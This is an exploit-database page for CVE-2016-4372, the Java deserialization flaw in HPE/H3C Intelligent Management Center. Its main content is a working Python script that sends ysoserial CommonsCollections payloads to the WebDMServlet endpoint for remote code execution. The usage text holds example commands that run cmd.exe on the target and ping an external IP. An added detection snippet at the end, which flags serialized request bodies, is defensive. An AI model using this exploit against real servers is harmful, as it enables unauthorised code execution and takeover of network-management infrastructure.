HPE < 7.2 - Java Deserialization Exploit

Published: 19 Sep 2017 00:00:00
Reported by: Raphael Kuhn
Type: zdt
Source: 0day.today
Views: 45

HPE/H3C IMC Java Deserialization Exploit version 0.1 for Windows Server 2008 R

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2016-4372 | 6 Jan 2024 22:32 | circl |
| CNVD | HPE IMC ACC Remote Code Execution Vulnerability | 17 Jul 2016 00:00 | cnvd |
| CVE | CVE-2016-4372 | 15 Jul 2016 16:00 | cve |
| Cvelist | CVE-2016-4372 | 15 Jul 2016 16:00 | cvelist |
| Tenable Nessus | H3C / HPE Intelligent Management Center Java Object Deserialization RCE | 23 Aug 2016 00:00 | nessus |
| Tenable Nessus | HP Intelligent Management Center Java Object Deserialization RCE | 24 Aug 2016 00:00 | nessus |
| Imperva Blog | Deserialization Attacks Surge Motivated by Illegal Crypto-mining | 24 Jan 2018 17:45 | impervablog |
| NVD | CVE-2016-4372 | 15 Jul 2016 16:59 | nvd |
| OSV | CVE-2016-4372 | 15 Jul 2016 16:59 | osv |
| Prion | Design/Logic Flaw | 15 Jul 2016 16:59 | prion |

Code

#!/usr/bin/env python
 
########################################################################################################
# 
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
#    Tested on Windows Server 2008 R2
#    Name   HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
# 
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
 
import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
host         = "127.0.0.1:8080"
payload_file = "payload.bin"
body        = ""
 
def printUsage () :
    print "......................................................................................................................"
    print "."
    print ". HPE/H3C - IMC Java Deserialization Exploit"
    print "."
    print ". Example 1: -payload-binary"
    print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
    print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
    print ".     1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
    print ".        java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
    print ".     2. Send request to server"
    print ".        %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin"  % sys.argv[0]
    print "."
    print ". Example 2: -payload-string"
    print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
    print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
    print ".     1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
    print '.        %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"'  % sys.argv[0]
    print "."
    print "......................................................................................................................"
 
def loadPayloadFile (_fileName) :
    print "[+] Load payload file %s" % _fileName
    payloadFile = open(_fileName, 'rb')
    payloadFile_read = payloadFile.read()
    return payloadFile_read
 
def exploit (_payload) :
    url = sys.argv[1]
    url += "/imc/topo/WebDMServlet"
    print "[+] Sending exploit to %s" % (url) 
    data = _payload
    response = requests.post(url, data=data, verify=False)
    return response
 
#def showResponse(_response):
#    r = response
#    m = r.search(_response)
#    if (m.find("java.lang.NullPointerException")):
#        print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
#    else:
#        print "[-] ClassCastException not found, exploit failed"
 
 
if __name__ == "__main__":
    if len(sys.argv) < 4:
        printUsage()
        sys.exit(0)
    else:
        print "------------------------------------------"
        print "- HPE/H3C - IMC Java Deserialization Exploit -"
        print "------------------------------------------"
        host = sys.argv[1]
        print "[*] Connecting to %s" %host
    if sys.argv[2] == "-payload-binary":
        payload_file = sys.argv[3]
        if os.path.isfile(payload_file):
            payload = loadPayloadFile(payload_file)
            response = exploit(payload)
            print "[+] Response received, exploit finished."
        else:
            print "[-] Can't load payload file"
    elif sys.argv[2] == "-payload-string":
            if os.path.isfile("ysoserial.jar"):
                sPayload = sys.argv[3]
                sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
                print "[+] Create payload file (%s) " %sPayload
                os.system(sPayload)
                payload = loadPayloadFile(payload_file)
                response = exploit(payload)
                print "[+] Response received, exploit finished."
            else:
                print "[-] Can't load ysoserial.jar"
    else:
        printUsage()

#  0day.today [2017-12-31]  #
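
The script above POSTs a raw Java serialized object to /imc/topo/WebDMServlet. The following detection check is an added example, not part of the original exploit or of any HPE tooling: it flags request bodies that begin with the Java serialization stream header and lists the class names they declare. The watchlist package, the finding labels and the sample requests are assumptions constructed for illustration.

```python
import struct

JAVA_MAGIC = b"\xac\xed\x00\x05"        # STREAM_MAGIC + STREAM_VERSION of Java serialization
TARGET_PATH = "/imc/topo/WebDMServlet"  # endpoint the exploit on this page posts to
# Assumption: package behind the CommonsCollections payloads named in the usage text.
WATCHLIST = ("org.apache.commons.collections.",)

def class_names(stream):
    """Heuristically list class names from TC_CLASSDESC (0x72) records in a stream."""
    names, i = [], stream.find(b"\x72")
    while i >= 0:
        if i + 3 <= len(stream):
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            name = stream[i + 3:i + 3 + length].decode("ascii", "replace")
            # A real descriptor has the name followed by an 8-byte serialVersionUID.
            complete = len(stream) >= i + 3 + length + 8
            if 0 < length <= 256 and complete and all(c.isalnum() or c in "._$[;" for c in name):
                names.append(name)
        i = stream.find(b"\x72", i + 1)
    return names

def inspect_request(method, path, body):
    """Return findings for one HTTP request; an empty list means nothing was flagged."""
    if not body.startswith(JAVA_MAGIC):
        return []
    findings = ["java-serialized-body"]
    if method == "POST" and path.split("?")[0] == TARGET_PATH:
        findings.append("imc-webdmservlet-post")
    for name in class_names(body):
        if name.startswith(WATCHLIST):
            findings.append("watchlisted-class:" + name)
    return findings

def _classdesc(name):
    # Constructed descriptor: tag, length-prefixed name, zeroed serialVersionUID.
    return b"\x72" + struct.pack(">H", len(name)) + name.encode() + b"\x00" * 8

SAMPLES = [  # constructed requests, not captured traffic
    ("POST", TARGET_PATH, JAVA_MAGIC + b"\x73" + _classdesc("org.apache.commons.collections.map.LazyMap")),
    ("POST", TARGET_PATH, JAVA_MAGIC + b"\x73" + _classdesc("java.util.HashMap")),
    ("POST", "/index.html", b"user=admin&lang=en"),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, inspect_request(method, path, body))
```

The class-name scan is a byte-pattern heuristic, not a full stream parser, so treat a watchlist hit as a triage signal and the stream header on this endpoint as the primary indicator.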

Vulners AI Score: 9.2 (High risk)
EPSS: 0.10201